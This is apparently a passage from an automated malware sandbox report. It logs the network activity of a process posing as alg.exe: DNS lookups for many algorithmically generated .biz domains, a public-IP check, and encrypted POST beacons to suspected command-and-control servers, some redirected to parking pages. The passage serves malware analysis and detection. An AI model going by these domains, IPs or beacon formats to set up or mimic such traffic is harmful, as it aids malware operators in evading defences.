Jan 10, 2025 16:02:38.943718910 CET	192.168.2.4	1.1.1.1	0xd4f1	Standard query (0)	opowhhece.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:39.670825005 CET	192.168.2.4	1.1.1.1	0x7716	Standard query (0)	zjbpaao.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:39.679812908 CET	192.168.2.4	1.1.1.1	0xd99f	Standard query (0)	jdhhbs.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:41.174349070 CET	192.168.2.4	1.1.1.1	0x1cf0	Standard query (0)	mgmsclkyu.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:41.969422102 CET	192.168.2.4	1.1.1.1	0xc903	Standard query (0)	warkcdu.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:44.828134060 CET	192.168.2.4	1.1.1.1	0xdab2	Standard query (0)	gcedd.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:03:36.533417940 CET	192.168.2.4	1.1.1.1	0xe513	Standard query (0)	jwkoeoqns.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 16:01:27.109097004 CET	1.1.1.1	192.168.2.4	0x7829	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:27.178436041 CET	1.1.1.1	192.168.2.4	0xf41b	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:27.178436041 CET	1.1.1.1	192.168.2.4	0xf41b	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:27.178436041 CET	1.1.1.1	192.168.2.4	0xf41b	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:29.468600035 CET	1.1.1.1	192.168.2.4	0x9699	No error (0)	ssbzmoy.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:30.137773037 CET	1.1.1.1	192.168.2.4	0xf854	No error (0)	s82.gocheapweb.com		51.195.88.199	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:32.621710062 CET	1.1.1.1	192.168.2.4	0x63de	No error (0)	cvgrf.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:33.789865971 CET	1.1.1.1	192.168.2.4	0xf355	No error (0)	npukfztj.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:34.360424042 CET	1.1.1.1	192.168.2.4	0x1c10	No error (0)	przvgke.biz		72.52.178.23	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:35.363436937 CET	1.1.1.1	192.168.2.4	0x63fb	No error (0)	ww12.przvgke.biz	084725.parkingcrew.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 16:01:35.363436937 CET	1.1.1.1	192.168.2.4	0x63fb	No error (0)	084725.parkingcrew.net		76.223.26.96	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:35.363436937 CET	1.1.1.1	192.168.2.4	0x63fb	No error (0)	084725.parkingcrew.net		13.248.148.254	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:36.508244038 CET	1.1.1.1	192.168.2.4	0x73a8	No error (0)	ww7.przvgke.biz	76899.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 16:01:36.508244038 CET	1.1.1.1	192.168.2.4	0x73a8	No error (0)	76899.bodis.com		199.59.243.228	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:37.086107969 CET	1.1.1.1	192.168.2.4	0xb603	Name error (3)	zlenh.biz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:37.095841885 CET	1.1.1.1	192.168.2.4	0x6381	No error (0)	knjghuig.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:38.745691061 CET	1.1.1.1	192.168.2.4	0x239a	Name error (3)	uhxqin.biz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:38.754079103 CET	1.1.1.1	192.168.2.4	0x2f78	Name error (3)	anpmnmxo.biz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:38.762949944 CET	1.1.1.1	192.168.2.4	0x7da9	No error (0)	lpuegx.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:43.170732975 CET	1.1.1.1	192.168.2.4	0x76db	No error (0)	vjaxhpbji.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:51.188332081 CET	1.1.1.1	192.168.2.4	0xdcd2	No error (0)	xlfhhhm.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:52.876610994 CET	1.1.1.1	192.168.2.4	0x6c5b	No error (0)	ifsaia.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:54.609764099 CET	1.1.1.1	192.168.2.4	0xb4af	No error (0)	saytjshyf.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:55.773772001 CET	1.1.1.1	192.168.2.4	0xcd0a	No error (0)	vcddkls.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:57.909383059 CET	1.1.1.1	192.168.2.4	0x7269	No error (0)	fwiwk.biz		72.52.178.23	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:58.849674940 CET	1.1.1.1	192.168.2.4	0x64ea	No error (0)	ww7.fwiwk.biz	76899.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 16:01:58.849674940 CET	1.1.1.1	192.168.2.4	0x64ea	No error (0)	76899.bodis.com		199.59.243.228	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:59.947577953 CET	1.1.1.1	192.168.2.4	0xa729	No error (0)	tbjrpv.biz		34.246.200.160	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:00.995433092 CET	1.1.1.1	192.168.2.4	0x867	No error (0)	deoci.biz		34.227.7.138	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:02.029907942 CET	1.1.1.1	192.168.2.4	0xa2f7	No error (0)	gytujflc.biz		208.117.43.225	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:02.929240942 CET	1.1.1.1	192.168.2.4	0xc89b	No error (0)	qaynky.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:04.520121098 CET	1.1.1.1	192.168.2.4	0x7061	No error (0)	bumxkqgxu.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:05.228740931 CET	1.1.1.1	192.168.2.4	0xb242	No error (0)	dwrqljrr.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:06.263951063 CET	1.1.1.1	192.168.2.4	0x2efd	No error (0)	nqwjmb.biz		35.164.78.200	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:07.328587055 CET	1.1.1.1	192.168.2.4	0x866c	No error (0)	ytctnunms.biz		3.94.10.34	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:07.963197947 CET	1.1.1.1	192.168.2.4	0xc2e2	No error (0)	myups.biz		165.160.15.20	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:07.963197947 CET	1.1.1.1	192.168.2.4	0xc2e2	No error (0)	myups.biz		165.160.13.20	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:09.103147984 CET	1.1.1.1	192.168.2.4	0x92b1	No error (0)	oshhkdluh.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:10.053721905 CET	1.1.1.1	192.168.2.4	0x1f4	No error (0)	yunalwv.biz		208.117.43.225	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:10.944336891 CET	1.1.1.1	192.168.2.4	0x20f6	No error (0)	jpskm.biz		18.246.231.120	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:12.758227110 CET	1.1.1.1	192.168.2.4	0x68f1	No error (0)	lrxdmhrr.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:13.941082954 CET	1.1.1.1	192.168.2.4	0x9289	No error (0)	wllvnzb.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:15.565977097 CET	1.1.1.1	192.168.2.4	0x64c6	No error (0)	gnqgo.biz		34.227.7.138	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:16.252448082 CET	1.1.1.1	192.168.2.4	0x9fa7	No error (0)	jhvzpcfg.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:16.956022024 CET	1.1.1.1	192.168.2.4	0xee56	No error (0)	acwjcqqv.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:18.754337072 CET	1.1.1.1	192.168.2.4	0xd857	No error (0)	vyome.biz		18.246.231.120	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:19.814213037 CET	1.1.1.1	192.168.2.4	0xef68	No error (0)	yauexmxk.biz		34.227.7.138	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:20.569376945 CET	1.1.1.1	192.168.2.4	0x84e8	No error (0)	iuzpxe.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:22.244934082 CET	1.1.1.1	192.168.2.4	0x741d	No error (0)	sxmiywsfv.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:23.899869919 CET	1.1.1.1	192.168.2.4	0x3e32	No error (0)	vrrazpdh.biz		18.246.231.120	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:24.952860117 CET	1.1.1.1	192.168.2.4	0xbeae	No error (0)	ftxlah.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:26.499088049 CET	1.1.1.1	192.168.2.4	0x690b	No error (0)	typgfhb.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:28.081334114 CET	1.1.1.1	192.168.2.4	0xb227	No error (0)	esuzf.biz		18.246.231.120	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:29.402318954 CET	1.1.1.1	192.168.2.4	0x5bbc	No error (0)	gvijgjwkh.biz		3.94.10.34	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:30.345715046 CET	1.1.1.1	192.168.2.4	0xab7a	No error (0)	qpnczch.biz		18.246.231.120	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:32.191020012 CET	1.1.1.1	192.168.2.4	0x7b6d	No error (0)	brsua.biz		3.254.94.185	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:33.018078089 CET	1.1.1.1	192.168.2.4	0x9498	No error (0)	dlynankz.biz		85.214.228.140	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:33.928044081 CET	1.1.1.1	192.168.2.4	0xcb5c	No error (0)	oflybfv.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:36.758318901 CET	1.1.1.1	192.168.2.4	0x849f	No error (0)	yhqqc.biz		18.246.231.120	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:37.535120964 CET	1.1.1.1	192.168.2.4	0xc61b	No error (0)	mnjmhp.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:38.950510025 CET	1.1.1.1	192.168.2.4	0xd4f1	No error (0)	opowhhece.biz		34.227.7.138	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:39.687567949 CET	1.1.1.1	192.168.2.4	0xd99f	No error (0)	jdhhbs.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:41.181909084 CET	1.1.1.1	192.168.2.4	0x1cf0	No error (0)	mgmsclkyu.biz		34.246.200.160	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:41.976604939 CET	1.1.1.1	192.168.2.4	0xc903	No error (0)	warkcdu.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:44.835138083 CET	1.1.1.1	192.168.2.4	0xdab2	No error (0)	gcedd.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:03:36.540472984 CET	1.1.1.1	192.168.2.4	0xe513	No error (0)	jwkoeoqns.biz		34.227.7.138	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

pywolwnvd.biz

ssbzmoy.biz

cvgrf.biz

npukfztj.biz

przvgke.biz

ww12.przvgke.biz

ww7.przvgke.biz

knjghuig.biz

lpuegx.biz

vjaxhpbji.biz

xlfhhhm.biz

ifsaia.biz

saytjshyf.biz

vcddkls.biz

fwiwk.biz

ww7.fwiwk.biz

tbjrpv.biz

deoci.biz

gytujflc.biz

qaynky.biz

bumxkqgxu.biz

dwrqljrr.biz

nqwjmb.biz

ytctnunms.biz

myups.biz

oshhkdluh.biz

yunalwv.biz

jpskm.biz

lrxdmhrr.biz

wllvnzb.biz

gnqgo.biz

jhvzpcfg.biz

acwjcqqv.biz

vyome.biz

yauexmxk.biz

iuzpxe.biz

sxmiywsfv.biz

vrrazpdh.biz

ftxlah.biz

typgfhb.biz

esuzf.biz

gvijgjwkh.biz

qpnczch.biz

brsua.biz

dlynankz.biz

oflybfv.biz

yhqqc.biz

mnjmhp.biz

opowhhece.biz

jdhhbs.biz

mgmsclkyu.biz

warkcdu.biz

gcedd.biz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	54.244.188.177	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:27.261519909 CET	360	OUT	POST /cxhmgtreorgudqu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:27.261543036 CET	770	OUT	Data Raw: e4 1c a1 b8 ee 8c dc a0 f6 02 00 00 eb 91 ec e3 b5 5f cc 89 f1 33 4a ec bf 12 41 88 d8 b8 e6 6d 1b 94 23 79 38 44 b2 cb 75 82 02 5b 44 ac 25 19 c6 82 77 43 14 0c f8 48 47 20 64 26 17 32 ad f7 78 16 03 ca b5 0d 8f 57 ac f3 5a f7 65 58 9d a3 5c e0 Data Ascii: _3JAm#y8Du[D%wCHG d&2xWZeX\f,vkZgrSRmWAIgc\|_QMO$Y$J#"z17rc8sc#eU-cVpRha>Gg<'u0mZ`S
Jan 10, 2025 16:01:27.968076944 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:01:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=daf8b0e2f0ac4cec1d04ca724e524966\|8.46.123.189\|1736521287\|1736521287\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	18.141.10.107	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:30.124608994 CET	350	OUT	POST /lfntrjx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:30.124631882 CET	770	OUT	Data Raw: 0b d9 bb a2 f7 cd f8 e3 f6 02 00 00 ed 94 65 1c a5 bd a1 c8 e0 1f 83 ff cf 10 27 cb d0 bc b7 46 c4 36 54 83 ac a9 61 00 52 af 9b 18 db ba c2 44 1c 89 92 bf 6e 25 10 1d 25 ee 05 e9 6c b7 22 a0 dd 44 19 0f d6 95 fa 02 d4 5b 4d a0 6a 4f e4 75 63 94 Data Ascii: e'F6TaRDn%%l"D[MjOucUU(NM;Diz:uQ/%muZ;>/~U9qY/Em:d5~d0 U<LgU_%\|X:LNhK{Z ?(j(
Jan 10, 2025 16:01:31.502162933 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:01:31 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=339b1cb7c1664216a152353110ef125b\|8.46.123.189\|1736521291\|1736521291\|0\|1\|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49735	54.244.188.177	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:32.844253063 CET	345	OUT	POST /crsx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:32.844276905 CET	770	OUT	Data Raw: 22 6f 08 ad 9d 9e da 5c f6 02 00 00 d9 87 1f 22 4a 2a 7d bc 59 ce 00 9e 66 1a 17 dc 00 c9 4e 2f 9d e1 32 dc 56 be af e4 19 65 9b 05 f7 08 3b 8c 21 2d b7 7d 8d 6b fd 4b 71 78 ba 31 86 b1 43 5b 13 90 e3 37 ba ce 4a 9a 09 ac dc 44 ea 99 7d 55 17 d5 Data Ascii: "o\"J*}YfN/2Ve;!-}kKqx1C[7JD}USCNH\yvw-lJ[8Jyg{ZiP<mC`~Fu]dN_:jI@`Zh[&)e/e '+?3BbDh>=m7a963vf
Jan 10, 2025 16:01:33.558762074 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:01:33 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=c36af243774f48d6d66e91ae30ba0288\|8.46.123.189\|1736521293\|1736521293\|0\|1\|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49736	44.221.84.105	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:33.834790945 CET	360	OUT	POST /yyvfretnbpwpuxhl HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:33.834803104 CET	770	OUT	Data Raw: c7 0c 0e 88 c5 7c be b6 f6 02 00 00 33 a8 92 b0 80 85 4d 0b 2c 0f 79 76 79 8b 44 75 25 0f 8d 2e 84 9f fc 9c a1 ac 1e dd 72 ec df 45 aa c4 30 96 e5 48 bf cc 91 69 5f 76 5b 14 54 2f e8 8e a6 4b 6c 25 c7 8d ab 67 10 30 cf 69 12 1c 01 8e 24 24 13 7a Data Ascii: \|3M,yvyDu%.rE0Hi_v[T/Kl%g0i$$zoEPnXk={ ExSA{KrM\rAELGW%\|psW.BypCGi/.i+N\lF'rpqY&I?TdlAG2-X2o
Jan 10, 2025 16:01:34.299659014 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:01:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=ecaccbf70c52f65c3136d6a1d33fa023\|8.46.123.189\|1736521294\|1736521294\|0\|1\|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49737	72.52.178.23	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:34.405782938 CET	350	OUT	POST /qbfrwab HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:34.405782938 CET	770	OUT	Data Raw: 3e 8f dc e6 ec 9d ac c8 f6 02 00 00 8b 22 5f 16 6a d7 51 35 50 ee 4a 2e f0 5f 47 ff dc 60 f8 f0 2d 54 8d 87 68 dc f7 4c 6d 93 45 24 89 be dd 8b 7a 54 21 d9 46 78 a5 9e 8c fb 3e e1 dc 5c e7 19 29 0e 80 bd 4f 5e 76 47 f7 f9 3c 0a bf 94 88 cf eb 52 Data Ascii: >"_jQ5PJ._G`-ThLmE$zT!Fx>\)O^vG<R'AVOoDxA[%jFT)+ku(lZQ7&J0o PU/% RI/#,5cvXJ K_UnOB/3TB&}t\|h
Jan 10, 2025 16:01:34.945739031 CET	281	IN	HTTP/1.1 302 Moved Temporarily Date: Fri, 10 Jan 2025 15:01:34 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Location: http://ww12.przvgke.biz/qbfrwab?usid=25&utid=8703404410 Cache-Control: no-cache Pragma: no-cache Access-Control-Allow-Origin: *
Jan 10, 2025 16:01:36.340089083 CET	344	OUT	POST /f HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:01:36.340143919 CET	770	OUT	Data Raw: 70 90 88 89 fd a8 3e a9 f6 02 00 00 93 b9 e9 79 9f 04 53 90 3c 25 9f b4 6f f4 9a 36 7f 62 a8 be 04 aa 4f 89 51 46 17 64 c2 e6 e6 81 00 84 04 60 ca f1 d6 9d d0 ea dd cf e6 45 cd c6 d7 3d d1 66 2f d5 6c 53 a7 a6 fd ff 90 0e 95 49 f4 82 18 bf 24 20 Data Ascii: p>yS<%o6bOQFd`E=f/lSI$ gz5_EtV-Cgxx]O\+S^K Qh8oBPY3jp+},\|u(euSwtKu?wPW'n-$q&
Jan 10, 2025 16:01:36.484292030 CET	274	IN	HTTP/1.1 302 Moved Temporarily Date: Fri, 10 Jan 2025 15:01:36 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Location: http://ww7.przvgke.biz/f?usid=25&utid=8703404831 Cache-Control: no-cache Pragma: no-cache Access-Control-Allow-Origin: *

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49739	76.223.26.96	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:01:35.415822983 CET	357	OUT	GET /qbfrwab?usid=25&utid=8703404410 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww12.przvgke.biz
Jan 10, 2025 16:01:36.164372921 CET	825	IN	HTTP/1.1 200 OK Accept-Ch: viewport-width Accept-Ch: dpr Accept-Ch: device-memory Accept-Ch: rtt Accept-Ch: downlink Accept-Ch: ect Accept-Ch: ua Accept-Ch: ua-full-version Accept-Ch: ua-platform Accept-Ch: ua-platform-version Accept-Ch: ua-arch Accept-Ch: ua-model Accept-Ch: ua-mobile Accept-Ch-Lifetime: 30 Content-Type: text/html; charset=UTF-8 Date: Fri, 10 Jan 2025 15:01:36 GMT Server: Caddy Server: nginx Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_SqdbhpD08RT5gR4hg0KQDAujXXWUEj/Ktnusbjf28qQxxeD+8GAQkkamfhRq1crasV1roNesWqlK0YjniM91hg== X-Domain: przvgke.biz X-Pcrew-Blocked-Reason: X-Pcrew-Ip-Organization: CenturyLink X-Subdomain: ww12 Transfer-Encoding: chunked
Jan 10, 2025 16:01:36.164448023 CET	1236	IN	Data Raw: 33 64 62 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 Data Ascii: 3db2<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_SqdbhpD08RT5gR4hg0KQDAujXXWUEj/Ktnusbjf28qQxxeD+8GAQkkamfhRq1crasV1ro
Jan 10, 2025 16:01:36.164479971 CET	224	IN	Data Raw: 67 69 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f Data Ascii: gin:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;
Jan 10, 2025 16:01:36.164516926 CET	1236	IN	Data Raw: 0a 09 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 7d 3c 2f 73 74 79 6c 65 3e 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 Data Ascii: -moz-border-radius: 4px;border-radius: 4px;}</style> <style media="screen">* { margin:0;padding:0}body { background:#101c36; font-family: sans-serif; text-align: center; font-size:1rem;}.header { padding:
Jan 10, 2025 16:01:36.164554119 CET	1236	IN	Data Raw: 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 73 65 61 72 63 68 48 6f 6c 64 65 72 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 70 78 20 30 20 31 70 78 20 31 70 78 3b 0a 20 20 20 20 6d Data Ascii: color:#626574 !important;}.searchHolder { padding:1px 0 1px 1px; margin:1rem auto; width: 95%; max-width: 500px;}@media screen and (min-width:600px) { .comp-is-parked, .comp-sponsored { color: #848484;
